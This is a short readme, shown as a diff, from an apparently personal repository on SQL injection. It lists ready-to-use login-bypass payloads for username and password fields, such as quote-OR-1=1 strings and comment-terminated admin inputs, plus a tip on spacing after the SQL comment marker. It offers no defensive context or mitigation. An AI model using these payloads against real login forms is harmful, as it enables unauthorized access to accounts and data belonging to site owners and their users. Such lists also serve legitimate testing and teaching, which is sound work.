DevRyzan/SQLInjection/readme.txt

 username= admin
 password = ' OR '1'='1

+#if you want to declare to password
+username : admin' OR '1'='1' --
+username : admin' OR 'a'='a' --
+username : admin' OR 1=1 --
+username : admin' AND '1'='1' --
+username : admin' OR password = 'password123' --
+username : admin' --

 #for any unknow user

 username: ' OR 1=1 -- #important!! you have to add a space after '--'